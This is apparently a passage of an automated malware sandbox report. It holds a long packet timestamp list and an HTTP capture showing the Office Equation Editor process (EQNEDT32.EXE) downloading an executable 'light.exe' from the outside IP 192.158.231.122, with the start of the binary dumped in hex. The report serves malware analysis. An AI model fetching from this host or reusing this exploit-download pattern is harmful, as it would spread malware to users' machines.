          Nov 20, 2020 19:32:06.291224003 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.291238070 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.291245937 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.291258097 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.291265011 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.291280031 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.291281939 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.291294098 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.291300058 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.291316986 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.291317940 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.291331053 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.291336060 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.291353941 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.291353941 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.291368008 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.291372061 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.291382074 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.291392088 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.291404009 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.291409969 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.291424990 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.291428089 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.291438103 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.291446924 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.291461945 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.291462898 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.291476965 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.291480064 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.291498899 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.291497946 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.291512966 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.291517019 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.291526079 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.291538000 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.291549921 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.291555882 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.291570902 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.291573048 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.291584969 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.291608095 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.409729004 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.409755945 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.409769058 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.409780979 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.409799099 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.409815073 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.409833908 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.409851074 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.409866095 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.409883022 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.409894943 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.409902096 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.409908056 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.409929037 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.409938097 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.409943104 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.409950018 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.409954071 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.409969091 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.409971952 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.409986973 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.409990072 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.410012007 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.410024881 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.410700083 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.410720110 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.410734892 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.410753965 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.410756111 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.410772085 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.410777092 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.410792112 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.410797119 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.410810947 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.410815001 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.410829067 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.410836935 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.410851002 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.410854101 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.410870075 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.410873890 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.410887003 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.410896063 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.410904884 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.410908937 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.410923958 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.410927057 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.410940886 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.410949945 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.410959959 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.410964012 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.410978079 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.410983086 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.411000013 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.411001921 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.411012888 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.411020041 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.411036015 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.411042929 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.411053896 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.411056995 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.411071062 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.411077023 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.411089897 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.411098003 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.411108017 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.411112070 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.411125898 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.411135912 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.411148071 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.411149025 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.411159992 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.411168098 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.411184072 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.411187887 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.411201954 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.411210060 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.411220074 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.411228895 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.411237955 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.411242008 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.411256075 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.411263943 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.411276102 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.411297083 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.411314011 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.411314964 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.411319017 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.411330938 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.411340952 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.411346912 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.411362886 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.411364079 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.411379099 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.411385059 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.411395073 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.411406040 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.411411047 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.411427021 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.411446095 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.411547899 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.411566973 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.411581993 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.411583900 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.411598921 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.411602020 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.411617994 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.411626101 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.411634922 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.411650896 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.411652088 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.411668062 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.411674976 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.411700964 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.412158966 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.412179947 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.412204981 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.412223101 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.412555933 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.412583113 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.412599087 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.412602901 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.412617922 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.412621975 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.412638903 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.412640095 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.412656069 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.412662983 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.412672997 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.412684917 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.412689924 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.412707090 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.412707090 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.412724018 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.412725925 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.412744045 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.412746906 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.412765980 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.412781954 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.412782907 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.412797928 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.412798882 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.412815094 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.412822008 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.412832022 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.412842989 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.412848949 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.412864923 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.412866116 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.412884951 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.412885904 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.412904024 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.412905931 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.412920952 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.412928104 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.412939072 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.412955046 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.412955046 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.412971973 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.412975073 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.412990093 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.412998915 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.413007021 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.413019896 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.413039923 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.413104057 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.413121939 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.413136959 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.413146019 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.413156986 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.413168907 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.413177013 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.413193941 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.413203001 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.413213968 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.413222075 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.413239002 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.413242102 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.413252115 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.413264036 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.413269043 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.413286924 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.413286924 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.413305998 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.413309097 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.413330078 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.413350105 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.414827108 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.414845943 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.414989948 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.415488005 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.415503979 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.415524960 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.415541887 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.415558100 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.415575027 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.415584087 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.415591955 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.415597916 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.415601015 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.415607929 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.415617943 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.415626049 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.415640116 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.415643930 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.415657043 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.415663958 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.415673971 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.415682077 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.415693998 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.415699959 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.415713072 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.415735006 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.415785074 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.415802002 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.415817976 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.415827990 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.415832996 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.415847063 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.415849924 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.415867090 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.415869951 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.415883064 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.415884972 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.415901899 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.415903091 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.415920019 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.415921926 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.415935993 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.415941954 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.415952921 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.415961027 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.415970087 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.415977001 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.415987015 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.415994883 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.416004896 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.416012049 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.416021109 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.416028976 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.416040897 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.416049004 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.416059971 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.416062117 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.416076899 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.416080952 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.416093111 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.416098118 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.416105986 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.416117907 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.416129112 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.416140079 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.416151047 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.416162968 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.416174889 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.416187048 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.416204929 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.416218042 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.416229010 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.416239023 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.416249037 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.416260004 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.416265011 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.416284084 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.416285038 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.416301966 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.416302919 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.416316032 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.416317940 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.416338921 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.416357994 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.421938896 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.423677921 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.905997992 CET4916780192.168.2.22192.158.231.122

          HTTP Request Dependency Graph

          • 192.158.231.122

          HTTP Packets

          Session IDSource IPSource PortDestination IPDestination PortProcess
          0192.168.2.2249167192.158.231.12280C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
          TimestampkBytes transferredDirectionData
          Nov 20, 2020 19:32:05.408795118 CET0OUTGET /light.exe HTTP/1.1
          Accept: */*
          Accept-Encoding: gzip, deflate
          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
          Host: 192.158.231.122
          Connection: Keep-Alive
          Nov 20, 2020 19:32:05.534420013 CET1INHTTP/1.1 200 OK
          Content-Type: application/octet-stream
          Last-Modified: Fri, 20 Nov 2020 12:02:01 GMT
          Accept-Ranges: bytes
          ETag: "a0bb98f434bfd61:0"
          Server: Microsoft-IIS/10.0
          Date: Fri, 20 Nov 2020 18:32:05 GMT
          Content-Length: 618496
          Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 3a b0 b7 5f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 08 00 00 68 09 00 00 06 00 00 00 00 00 00 4e 87 09 00 00 20 00 00 00 a0 09 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 e0 09 00 00 02 00 00 ac 54 0a 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 87 09 00 4b 00 00 00 00 a0 09 00 42 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 09 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 54 67 09 00 00 20 00 00 00 68 09 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 42 02 00 00 00 a0 09 00 00 04 00 00 00 6a 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 c0 09 00 00 02 00 00 00 6e 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 87 09 00 00 00 00 00 48 00 00 00 02 00 05 00 60 e7 08 00 a0 9f 00 00 03 00 00 00 10 00 00 06 f0 71 00 00 70 75 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 61 00 62 00 64 00 63 00 65 00 66 00 67 00 68 00 69 00 6a 00 6b 00 6c 00 6d 00 6e 00 70 00 72 00 71 00 73 00 74 00 75 00 76 00 77 00 7a 00 79 00 78 00 30 00 31 00 32 00 33 00 34 00 35 00 36 00 37 00 38 00 39 00 41 00 42 00 43 00 44 00 45 00 46 00 47 00 48 00 49 00 4a 00 4b 00 4c 00 4d 00 4e 00 51 00 50 00 52 00 54 00 53 00 56 00 55 00 57 00 58 00 59 00 5a 00 36 02 03 28 03 00 00 06 6f 01 00 00 0a 2a 42 03 02 03 28 01 00 